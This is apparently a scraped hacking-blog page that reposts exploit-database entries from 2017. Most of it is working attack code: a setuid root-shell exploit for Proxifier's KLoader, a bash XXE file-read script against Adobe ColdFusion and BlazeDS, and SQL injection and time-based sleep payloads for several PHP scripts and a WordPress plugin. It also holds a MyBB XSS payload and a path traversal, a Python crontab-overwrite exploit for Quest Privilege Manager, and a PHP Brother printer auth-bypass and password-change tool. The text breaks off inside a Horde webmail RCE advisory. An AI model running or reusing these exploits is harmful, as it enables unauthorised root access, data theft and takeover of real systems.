# Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a
KLoader binary which it installs suid root the first time Proxifier is run. This
binary serves a single purpose which is to load and unload Proxifier's kernel
extension.
Unfortunately it does this by taking the first parameter passed to it on the
commandline without any sanitisation and feeding it straight into system().
This means not only can you load any arbitrary kext as a non-root user but you
can also get a local root shell.
Although this is a bit of a terrible bug that shouldn't be happening in 2017,
Proxifier's developers fixed the issue in record time so that's something!
Everyone using Proxifier for Mac should update to 2.19 as soon as possible.
https://m4.rkw.io/proxifier_privesc.sh.txt
6040180f672a2b70511a483e4996d784f03e04c624a8c4e01e71f50709ab77c3
-------------------------------------------------------------------
#!/bin/bash
#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.18 #
#####################################################################
# by m4rkw #
#####################################################################
cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
gcc -o /tmp/a a.c
rm -f a.c
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a'
/tmp/a
-------------------------------------------------------------------
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153200
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/bin/bash
#
# Exploit Title: Adobe XML Injection file content disclosure
# Date: 07-04-2017
# Exploit Author: Thomas Sluyter
# Website: https://www.kilala.nl
# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html
# Version: Multiple Adobe products
# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise
# CVE : 2009-3960
#
# Shell script that let's you exploit a known XML injection vulnerability
# in a number of Adobe products, allowing you to read files that are otherwise
# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject
# This script is a Bash implementation of the PoC multiple/dos/11529.txt.
#
# According to the original Metasploit code, this attack works with:
# "Multiple Adobe Products: BlazeDS 3.2 and earlier versions,
# LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1,
# and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2"
#
PROGNAME="$(basename $0)" # This script
TIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles
SCRATCHFILE="/tmp/${PROGNAME}.${TIMESTAMP}" # Used as generic scratchfile
EXITCODE="0" # Assume success, changes on errors
CURL="/usr/bin/curl" # Other locations are detected with "which"
SSL="0" # Overridden by -s
DEBUG="0" # Overridden by -d
BREAKFOUND="0" # Overridden by -b
TARGETHOST="" # Overridden by -h
TARGETPORT="8400" # Overridden by -p
READFILE="/etc/passwd" # Overridden by -f
################################## OVERHEAD SECTION
#
# Various functions for overhead purposes.
#
# Defining our own logger function, so we can switch between stdout and syslog.
logger() {
LEVEL="$1"
MESSAGE="$2"
# You may switch the following two, if you need to log to syslog.
#[[ ${DEBUG} -gt 0 ]] && echo "${LEVEL} $MESSAGE" || /usr/bin/logger -p ${LEVEL} "$MESSAGE"
[[ ${DEBUG} -gt 0 ]] && echo "${LEVEL} $MESSAGE" || echo "${LEVEL} $MESSAGE"
}
ExitCleanup() {
EXITCODE=${1}
rm -f ${SCRATCHFILE}* >/dev/null 2>&1
echo ""
exit ${EXITCODE}
}
# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script
ValidIP() {
local IP=${1}
local STAT=1
if [[ ${IP} =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]
then
OIFS=$IFS; IFS='.'
IP=(${IP})
IFS=$OIFS
[[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]]
stat=$?
fi
return $stat
}
# Function to output help information.
show-help() {
echo ""
cat << EOF
${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file]
-? Show this help message.
-d Debug mode, outputs more kruft on stdout.
-s Use SSL / HTTPS, instead of HTTP.
-b Break on the first valid answer found.
-h Target host
-p Target port, defaults to 8400.
-f Full path to file to grab, defaults to /etc/passwd.
This script exploits a known vulnerability in a set of Adobe applications. Using one
of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is
normally inaccessible.
NOTE: Windows paths use \\, so be sure to properly escape them when using -f! For example:
${PROGNAME} -h 192.168.1.20 -f c:\\\\coldfusion8\\\\lib\\\\password.properties
${PROGNAME} -h 192.168.1.20 -f 'c:\\coldfusion8\\lib\\password.properties'
This script relies on CURL, so please have it in your PATH.
EOF
}
# Parsing and verifying the passed parameters.
OPTIND=1
while getopts "?dsbh:p:f:" opt; do
case "$opt" in
\?) show-help; ExitCleanup 0 ;;
d) DEBUG="1" ;;
s) SSL="1" ;;
b) BREAKFOUND="1" ;;
h) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)
ValidIP ${OPTARG}; if [[ $? -eq 0 ]]
then TARGETHOST=${OPTARG}
else TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}')
[[ $? -gt 0 ]] && (logger ERROR "Target host ${TARGETHOST} not found in DNS."; ExitCleanup 1)
fi ;;
p) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)
if [[ ! -z $(echo ${OPTARG} | tr -d '[:alnum:]') ]]
then logger ERROR "Target port ${OPTARG} is incorrect."; ExitCleanup 1
else TARGETPORT=${OPTARG}
fi ;;
f) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)
if [[ (-z $(echo ${OPTARG} | grep ^\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]]
then logger ERROR "File is NOT specified with full Unix or Windows path."; ExitCleanup 1
else READFILE=${OPTARG}
fi ;;
*) show-help; ExitCleanup 0 ;;
esac
done
[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR "CURL was not found."; ExitCleanup 1)
[[ -z ${TARGETHOST} ]] && (logger ERROR "Target host was not set."; ExitCleanup 1)
[[ ${DEBUG} -gt 0 ]] && logger DEBUG "Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}."
################################## GETTING TO WORK
#
#
PATHLIST=("/flex2gateway/" "/flex2gateway/http" "/flex2gateway/httpsecure" \
"/flex2gateway/cfamfpolling" "/flex2gateway/amf" "/flex2gateway/amfpolling" \
"/messagebroker/http" "/messagebroker/httpsecure" "/blazeds/messagebroker/http" \
"/blazeds/messagebroker/httpsecure" "/samples/messagebroker/http" \
"/samples/messagebroker/httpsecure" "/lcds/messagebroker/http" \
"/lcds/messagebroker/httpsecure" "/lcds-samples/messagebroker/http" \
"/lcds-samples/messagebroker/httpsecure")
echo "<?xml version=\"1.0\" encoding=\"utf-8\"?>" > ${SCRATCHFILE}
echo "<!DOCTYPE test [ <!ENTITY x3 SYSTEM \"${READFILE}\"> ]>" >> ${SCRATCHFILE}
echo "<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">" >> ${SCRATCHFILE}
echo "<body><object type=\"flex.messaging.messages.CommandMessage\"><traits>" >> ${SCRATCHFILE}
echo "<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>" >> ${SCRATCHFILE}
echo "<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>" >> ${SCRATCHFILE}
echo "<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>" >> ${SCRATCHFILE}
echo "<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>" >> ${SCRATCHFILE}
echo "<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>" >> ${SCRATCHFILE}
if [[ ${DEBUG} -gt 0 ]]
then
logger DEBUG "XML file sent to target host reads as follows:"
echo "======================================"
cat ${SCRATCHFILE}
echo "======================================"
echo ""
fi
let CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1
for ADOBEPATH in "${PATHLIST[@]}"
do
[[ ${SSL} -gt 0 ]] && PROTOCOL="https" || PROTOCOL="http"
URI="${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}"
[[ ${DEBUG} -gt 0 ]] && logger DEBUG "Proceeding with URI: ${URI}"
# Header contents based on a tcpdump capture of original exploit being
# run from Metasploit.
HEADER="-H \"Host: ${TARGETHOST}\" -H \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" -H \"Content-Type: application/x-www-form-urlencoded\" -H \"Content-Length: ${CONTENTLENGTH}\""
CURLPOST="${CURL} -X POST -k -s --http1.1 ${HEADER} -w \"%{http_code}\" -d @- ${URI}"
[[ ${DEBUG} -gt 0 ]] && logger DEBUG "Using this CURL command: ${CURLPOST}"
# The tr command dikes out any non-ASCII characters which might mess with output.
CURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\11\12\15\40-\176' 2>&1)
# Output is pretty garbled and the HTTP return code is enclosed in double quotes.
# I need to grab the last 5 chars (includes NULL EOF) and remove the ".
CURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:])
if [[ ${DEBUG} -gt 0 ]]
then
logger DEBUG "CURL was given this HTTP return code: ${CURLCODE}."
logger DEBUG "Output from CURL reads as follows:"
echo "======================================"
echo "${CURLOUTPUT}"
echo "======================================"
echo ""
fi
logger INFO "${CURLCODE} for ${URI}"
if [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep "<?xml version=")) ]]
then
echo "Read from ${URI}:"
echo "${CURLOUTPUT}" | sed 's/^[^<]*</</'
[[ ${BREAKFOUND} -gt 0 ]] && ExitCleanup 0
fi
if [[ ${DEBUG} -gt 0 ]]
then
echo -e "\nReady to continue with the next URI? [y/n]: \c"
read READY
case ${READY} in
y|Y|yes) logger DEBUG "Moving to next URI."; echo "" ;;
*) logger DEBUG "Aborting..."; ExitCleanup 1 ;;
esac
fi
done
ExitCleanup 0
# # # # #
# Exploit Title: Classified Portal Software 5.1 - SQL Injection
# Google Dork: N/A
# Date: 11.04.2017
# Vendor Homepage: http://www.myclassifiedscript.com/
# Software: http://www.myclassifiedscript.com/demo.html
# Demo: http://www.clpage.com/
# Version: 5.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search-result.php?keyword=&ad_id=222&cat_level_root=4&cat_level_one=&cat_level_two=&classi_ad_type=[SQL]&sub.x=46&sub.y=8&searchkey=search_record
# http://localhost/[PATH]/search-result.php?keyword=&ad_id=[SQL]&cat_level_root=4&cat_level_one=&cat_level_two=&classi_ad_type=&sub.x=46&sub.y=8&searchkey=search_record
# Etc...
# # # # #
=============================================
MGC ALERT 2017-003
- Original release date: April 06, 2017
- Last revised: April 10, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection
II. BACKGROUND
-------------------------
WordPress event calendar is a FREE user-friendly responsive plugin to
manage multiple recurring events and with various options.
III. DESCRIPTION
-------------------------
This bug was found using the portal in the files:
/spider-event-calendar/calendar_functions.php: if
(isset($_POST['order_by'])) {
/spider-event-calendar/widget_Theme_functions.php: if
(isset($_POST['order_by']) && $_POST['order_by'] != '') {
And when the query is executed, the parameter "order_by" it is not
sanitized:
/spider-event-calendar/front_end/frontend_functions.php: $rows =
$wpdb->get_results($query." ".$order_by);
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code.
IV. PROOF OF CONCEPT
-------------------------
The following URL have been confirmed to all suffer from Time Based SQL
Injection.
Time Based SQL Injection POC:
POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.1
search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(2)))a)
(2 seconds of response)
search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(30)))a)
(30 seconds of response)
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Spider Event Calendar <= 1.5.51
VII. SOLUTION
-------------------------
Vendor release a new version.
https://downloads.wordpress.org/plugin/spider-event-calendar.1.5.52.zip
VIII. REFERENCES
-------------------------
https://es.wordpress.org/plugins/spider-event-calendar/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
April 06, 2017 1: Initial release
April 10, 2017 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
April 06, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
April 06, 2017 2: Send to vendor
April 07, 2017 3: Vendor fix the vulnerability and release a new version
April 10, 2017 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
# # # # #
# Exploit Title: FAQ Script 3.1.3 - SQL Injection
# Google Dork: N/A
# Date: 11.04.2017
# Vendor Homepage: http://www.phponly.com/
# Software: http://www.phponly.com/faq.html
# Demo: http://www.phponly.com/demo/faq/
# Version: 3.1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/home/categorySearch?category_id=[SQL]
# # # # #
# # # # #
# Exploit Title: Social Directory Script 2.0 - SQL Injection
# Google Dork: N/A
# Date: 11.04.2017
# Vendor Homepage: http://www.phponly.com/
# Software: http://www.phponly.com/Social-Directory.html
# Demo: http://www.phponly.com/demo/link/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?subcategory=[SQL]
# http://localhost/[PATH]/searchtopic.php?search=[SQL]
# http://localhost/[PATH]/index.php?category=[SQL]
# phponly_link_admin:id
# phponly_link_admin:username
# phponly_link_admin:password
# # # # #
Description:
============
product:MyBB
Homepage:https://mybb.com/
vulnerable version:<1.8.11
Severity:High risk
===============
Proof of Concept:
=============
1.post a thread or reply any thread ,write:
[email=2"onmouseover="alert(document.location)]hover me[/email]
then when user’s mouse hover it,XSS attack will occur!
============
Fixed:
============
This vulnerability was fixed in version 1.8.11
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
=============
#!/usr/bin/env python2
"""
# Exploit Title: Quest Privilege Manager pmmasterd Arbitrary File Write
# Date: 10/Mar/2017
# Exploit Author: m0t
# Vendor Homepage: https://www.quest.com/products/privilege-manager-for-unix/
# Version: 6.0.0-27, 6.0.0-50
# Tested on: ubuntu 14.04 x86_64, ubuntu 16.04 x86, ubuntu 12.04 x86
# CVE : 2017-6554
REQUIREMENTS
- Root privs are required to bind a privileged source port
- python hexdump: pip install hexdump
This PoC gains arbitrary command execution by overwriting /etc/crontab
In case of successful exploitation /etc/crontab will contain the following line
* * * * * root touch /tmp/pwned
"""
import binascii as b
import hexdump as h
import struct
import sys
import socket
from Crypto.Cipher import AES
cipher=None
def create_enc_packet(action, len1=None, len2=None, body=None):
global cipher
if body == None:
body_raw = b.unhexlify("50696e6745342e362e302e302e32372e")
else:
body_raw = b.unhexlify(body)
#pad
if len(body_raw) % 16 != 0:
body_raw += "\x00" * (16 - (len(body_raw) % 16))
enc_body = cipher.encrypt(body_raw)
if len1 == None:
len1 = len(body_raw)
if len2 == None:
len2 = len(enc_body)
head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68
return head+enc_body
def decrypt_packet(packet):
global cipher
return cipher.decrypt(packet[80:])
def create_packet(action, len1=None, len2=None, body=None):
if body == None:
body = "50696e6745342e362e302e302e32372e"
if len1 == None:
len1 = len(body)/2
if len2 == None:
len2 = len1
head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68
return head+b.unhexlify(body)
#extract action code from first 4b, return action found
def get_action(packet):
code = struct.unpack('>I',packet[:4])[0]
return code
def generate_aes_key(buf):
some_AES_bytes = [
0xDF, 0x4E, 0x34, 0x05, 0xF4, 0x4D, 0x19, 0x22, 0x98, 0x4F,
0x58, 0x62, 0x2C, 0x2A, 0x54, 0x42, 0xAA, 0x76, 0x53, 0xD4,
0xF9, 0xDC, 0x98, 0x90, 0x23, 0x49, 0x71, 0x12, 0xEA, 0x33,
0x12, 0x63
];
retbuf = ""
if len(buf) < 0x20:
print("[-] initial key buffer too small, that's bad")
return None
for i in range(0x20):
retbuf+= chr(ord(buf[i])^some_AES_bytes[i])
return retbuf
def main():
global cipher
if len(sys.argv) < 2:
print("usage: %s <target ip> [<sport>]" % sys.argv[0])
sys.exit(-1)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) > 2:
sport = int(sys.argv[2])
else:
sport = 666
s.bind(("0.0.0.0", sport))
s.connect((sys.argv[1], 12345))
try:
s.send(create_packet(0xfa, body=b.hexlify("/etc/crontab")))
#s.send(create_packet(0x134))
print("[+] sent ACT_NEWFILESENT")
resp=s.recv(1024)
h.hexdump(resp)
action=get_action(resp)
if action == 212:
print("[+] server returned 212, this is a good sign, press Enter to continue")
else:
print("[-] server returned %d, exploit will probably fail, press CTRL-C to exit or Enter to continue" % action)
sys.stdin.readline()
print("[+] exchanging DH pars")
dh="\x00"*63+"\x02"
s.send(dh)
dh=s.recv(1024)
h.hexdump(dh)
aes_key = generate_aes_key(dh)
print("[+] got AES key below:")
h.hexdump(aes_key)
cipher=AES.new(aes_key)
print("[+] press Enter to continue")
sys.stdin.readline()
print("[+] sending:")
enc=create_enc_packet(0xfb, body=b.hexlify("* * * * * root touch /tmp/pwned\n"))
h.hexdump(enc)
s.send(enc )
enc=create_enc_packet(0xfc, body="")
h.hexdump(enc)
s.send(enc )
print("[+] got:")
resp=s.recv(1024)
h.hexdump(resp)
print("[+] trying decrypt")
h.hexdump(decrypt_packet(resp))
s.close()
except KeyboardInterrupt:
s.close()
exit(-1)
main()
Description:
============
product: MyBB
Homepage: https://mybb.com/
vulnerable version: < 1.8.11
Severity: Low risk
===============
Proof of Concept:
=============
vulnerability address:http://127.0.0.1/mybb_1810/Upload/admin/index.php?module=config-smilies&action=add_multiple
vulnerability file directory:/webroot/mybb_1810/Upload/admin/modules/config/smilies.php
vulnerability Code:
Line 326 $path = $mybb->input['pathfolder'];
Line 327 $dir = @opendir(MYBB_ROOT.$path);
if we input "pathfolder" to "../../bypass/smile",Directory Traversal success!
============
Fixed:
============
This vulnerability was fixed in version 1.8.11
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
=============
<?php
/*
# Title: Brother Devices Web Auth Bypass / Change Password Exploit
# Vendor: Brother (http://www.brother.com/)
# Affected models: Most of Brother devices from MFC, DCP, HL & ADS Series - see vulnerable models below for more info
# Release date: 11.04.2017
# CVE: CVE-2017-7588
# Author: Patryk Bogdan (@patryk_bogdan)
--
Description:
Most of Brother devices web authorization can be bypassed through trivial bug in login proccess.
Even after failed login attempt, in http response headers appears valid authorization cookie.
PoC for MFC-J6520DW:
usr@lnx:~# curl -sD - --data "B734=xyz&loginurl=%2Fgeneral%2Fstatus.html" http://192.168.1.111/general/status.html -o /dev/null | grep Cookie
Set-Cookie: AuthCookie=c243a9ee18a9327bfd419f31e75e71c7; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/;
--
Modes:
silent: Gives authorized cookie without changing password, so you can login without getting noticed.
changepass: Change login password to the one you provided.
Note:
Authorization cookie is fixed and it is created as following:
Plaintext password --> ASCII hex --> md5
(e.g. AuthCookie=c243a9ee18a9327bfd419f31e75e71c7 for 'test' password)
This information can be used to crack current password from exported cookie.
Fix:
Minimize network access to Brother MFC device or disable HTTP(S) interface.
Confirmed vulnerable:
MFC-J6973CDW
MFC-J4420DW
MFC-8710DW
MFC-J4620DW
MFC-L8850CDW
MFC-J3720
MFC-J6520DW
MFC-L2740DW
MFC-J5910DW
MFC-J6920DW
MFC-L2700DW
MFC-9130CW
MFC-9330CDW
MFC-9340CDW
MFC-J5620DW
MFC-J6720DW
MFC-L8600CDW
MFC-L9550CDW
MFC-L2720DW
DCP-L2540DW
DCP-L2520DW
HL-3140CW
HL-3170CDW
HL-3180CDW
HL-L8350CDW
HL-L2380DW
ADS-2500W
ADS-1000W
ADS-1500W
For educational purposes only.
*/
/* ----------------------------- */
$address = "http://192.168.1.111";
//$mode = "silent";
$mode = "changepass";
$newpass = "letmein";
/* ----------------------------- */
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0';
$address = preg_replace('{/$}', '', $address);
libxml_use_internal_errors(true);
function getPwdValue($address) {
global $user_agent;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $address."/admin/password.html");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, getCookie($address));
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
$content = curl_exec($ch);
$dom = new DOMDocument();
$dom->loadHTML($content);
$inputs = $dom->getElementsByTagName('input');
foreach($inputs as $i) {
if($i->getAttribute('id') === $i->getAttribute('name') && $i->getAttribute('type') === 'password') {
return $i->getAttribute('name');
}
}
}
function getLogValue($address) {
global $user_agent;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $address);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
$content = curl_exec($ch);
$dom = new DOMDocument();
$dom->loadHTML($content);
if(strstr($dom->getElementsByTagName('a')->item(0)->nodeValue, 'Please configure the password')) {
print 'Seems like password is not set! Exiting.'; exit; }
$value = $dom->getElementById('LogBox')->getAttribute('name');
return $value;
}
function getCookie($host) {
global $address, $user_agent;
$log_var = getLogValue($address);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $address."/general/status.html");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
$log_var."=xyz&loginurl=%2Fgeneral%2Fstatus.html");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
$content = curl_exec($ch);
if($content == true) {
$cookies = array();
preg_match_all('/Set-Cookie:(?<cookie>\s{0,}.*)$/im', $content, $cookies);
if(!empty($cookies['cookie'])) {
$exploded = explode(';', $cookies['cookie'][0]);
} else { print 'Failed getting cookies for '.$address.' address - check your settings'; exit; }
} else { print 'Got error requesting '.$address.' address - check your settings'; exit; }
return trim($exploded[0]);
}
if($mode === "silent") {
print 'Here\'s your authorization cookie: '.getCookie($address);
} elseif ($mode === "changepass") {
global $address, $newpass;
$cookie = getCookie($address);
$pwd_var = getPwdValue($address);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $address."/admin/password.html");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"pageid=1&".$pwd_var."=".$newpass."&temp_retypePass=".$newpass);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
$content = curl_exec($ch);
if($content == true) {
print 'Password changed to: '.$newpass;
} else { print 'Got error requesting '.$address.' address - check your settings'; exit; }
}
?>
Source: https://blogs.securiteam.com/index.php/archives/3107
Vulnerabilities Summary
The following advisory describes two (2) vulnerabilities found in
Horde Groupware Webmail.
Horde Groupware Webmail Edition is a free, enterprise ready, browser
based communication suite. Users can read, send and organize email
messages and manage and share calendars, contacts, tasks, notes,
files, and bookmarks with the standards compliant components from the
Horde Project. Horde Groupware Webmail Edition bundles the separately
available applications IMP, Ingo, Kronolith, Turba, Nag, Mnemo,
Gollem, and Trean.
It can be extended with any of the released Horde applications or the
applications that are still in development, like a bookmark manager or
a file manager.
Affected versions: Horde 5, 4 and 3
The vulnerabilities found in Horde Groupware Webmail are:
Authentication Remote Code Execution
Unauthentication Remote Code Execution
Credit
An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
Horde has released a patch to address the vulnerabilities.
For more information:
https://lists.horde.org/archives/horde/Week-of-Mon-20170403/056767.html
Vulnerabilities Details
Authentication Remote Code Execution
Horde Webmail contains a vulnerability that allows a remote attacker
to execute arbitrary code with the privileges of the user who runs the
web server.
For successful attack GnuPG feature should be enabled on the target
server (path to gpg binary should be defined in $conf[gnupg][path]
setting).
Vulnerable code: encryptMessage() function of GPG feature.
Path: /Horde/Crypt/Pgp/Backend/Binary.php:
/* 416 */ public function encryptMessage($text, $params)
/* 417 */ {
/* … */
/* 435 */ foreach (array_keys($params['recips']) as $val) {
/* 436 */ $cmdline[] = '--recipient ' . $val;
#! vulnerable code
/* … */
/* 444 */ /* Encrypt the document. */
/* 445 */ $result = $this->_callGpg(
/* 446 */ $cmdline,
/* 447 */ 'w',
/* 448 */ empty($params['symmetric']) ? null : $params['passphrase'],
/* 449 */ true,
/* 450 */ true
/* 451 */ );
$params[‘recips’] will be added to $cmdline array and passed to _callGpg():
Path: /Horde/Crypt/Pgp/Backend/Binary.php:
/* 642 */ public function _callGpg(
/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false,
/* 644 */ $parseable = false, $verbose = false
/* 645 */ )
/* 646 */ {
/* … */
/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options));
/* … */
/* 681 */ if ($mode == 'w') {
/* 682 */ if ($fp = popen($cmdline, 'w')) { #!
vulnerable code
/* … */
We can see that our recipients (addresses) will be in command line
that is going to be executed. encryptMessage() function can be reached
by various API, requests. For example it will be called when user try
to send encrypted message.
Our request for encryption and sending our message will be processed
by buildAndSendMessage() method:
Path: /imp/lib/Compose.php
/* 733 */ public function buildAndSendMessage(
/* 734 */ $body, $header, IMP_Prefs_Identity $identity, array $opts = array()
/* 735 */ )
/* 736 */ {
/* 737 */ global $conf, $injector, $notification, $prefs, $registry, $session;
/* 738 */
/* 739 */ /* We need at least one recipient & RFC 2822 requires that no 8-bit
/* 740 */ * characters can be in the address fields. */
/* 741 */ $recip = $this->recipientList($header);
/* ... */
/* 793 */ /* Must encrypt & send the message one recipient at a time. */
/* 794 */ if ($prefs->getValue('use_smime') &&
/* 795 */ in_array($encrypt, array(IMP_Crypt_Smime::ENCRYPT,
IMP_Crypt_Smime::SIGNENC))) {
/* ... */
/* 807 */ } else {
/* 808 */ /* Can send in clear-text all at once, or PGP can encrypt
/* 809 */ * multiple addresses in the same message. */
/* 810 */ $msg_options['from'] = $from;
/* 811 */ $save_msg = $this->_createMimeMessage($recip['list'], $body,
$msg_options); #! vulnerable code
In line 741 it tries to create recipient list: Horde parsers values of
‘to’, ‘cc’, ‘bcc’ headers and creates list of Rfc822 addresses. In
general there are restrictions for characters in addresses but if we
will use the next format:
display-name <"somemailbox"@somedomain.com>
somemailbox will be parsed by _rfc822ParseQuotedString() method:
Path: /Horde/Mail/Rfc822.php:
/* 557 */ protected function _rfc822ParseQuotedString(&$str)
/* 558 */ {
/* 559 */ if ($this->_curr(true) != '"') {
/* 560 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.');
/* 561 */ }
/* 563 */ while (($chr = $this->_curr(true)) !== false) {
/* 564 */ switch ($chr) {
/* 565 */ case '"':
/* 566 */ $this->_rfc822SkipLwsp();
/* 567 */ return;
